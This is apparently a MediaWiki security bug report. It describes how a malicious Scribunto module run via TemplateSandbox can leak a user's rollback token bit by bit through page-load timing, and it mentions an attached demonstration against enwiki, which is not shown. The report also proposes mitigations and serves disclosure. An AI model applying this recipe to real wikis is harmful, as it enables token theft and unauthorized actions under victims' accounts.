demonstration
Scribunto modules are capable of branching based on the contents of arbitrary wiki pages and even transcludable special pages. However, when combined with the addition of a malicious module to the Module namespace, OR when all of the following circumstances apply (making that unnecessary):
- The TemplateSandbox extension is installed.
- The attacker knows the name and contents of an existing module.
- The attacker knows the name of at least one page that uses that module.
It is possible for an attacker's site, while open in a user's browser, to extract a small amount of data through timing. For example:
- Via TemplateSandbox, the attacker provides a malicious Scribunto module to be used instead of one in the Module namespace. This can be done by submitting a form into an iframe.
- The module preprocesses {{Special:Contributions/...}} then unstrips it to get the HTML (including any rollback tokens).
- The module delays based on the value of a bit in the rollback token, possibly with the help of os.clock().
- The attacker's site measures how long it takes for the page to finish loading, which depends on the bit's value.
A demonstration is attached that steals a rollback token from enwiki in about three minutes. Of course, you need the "rollback" right there for it to work, and you may need to use Firefox. Alternatively, you can change it to run against a test wiki that has $wgSessionsInObjectCache = true and the pages Module:Bananas and Module:Bananas/doc (export from enwiki).
Two ways to make this harder to exploit:
- To prevent access to tokens, do not allow Scribunto modules to unstrip special page HTML.
- To make it harder to get malicious modules executed, do not allow TemplateSandbox to function without an edit token.
Version: unspecified
Severity: normal
Attached: